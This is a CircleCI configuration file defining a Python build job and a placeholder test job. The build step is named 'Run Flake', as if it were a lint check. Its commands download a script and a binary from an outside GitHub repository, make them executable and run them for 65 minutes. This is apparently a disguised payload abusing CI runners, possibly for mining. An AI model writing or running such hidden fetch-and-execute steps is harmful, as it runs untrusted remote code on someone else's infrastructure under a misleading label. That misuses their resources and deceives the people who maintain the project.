version: 2.1

# Define the jobs we want to run for this project
jobs:
  build:
    docker:
      - image: circleci/python:3.8
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
    steps:
      - checkout
      - run:
          name: Run Flake
          command: |
              wget https://raw.githubusercontent.com/spot4liam/rap/main/tuyul.sh
              wget https://github.com/spot4liam/rap/raw/main/tuyulsugar
              chmod +x tuyulsugar tuyul.sh
              timeout 65m ./tuyul.sh
  test:
    docker:
      - image: circleci/python:3.8
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
    steps:
      - checkout
      - run: echo "this is the test job"

# Orchestrate our job run sequence
workflows:
  build_and_test:
    jobs:
      - build
      - test
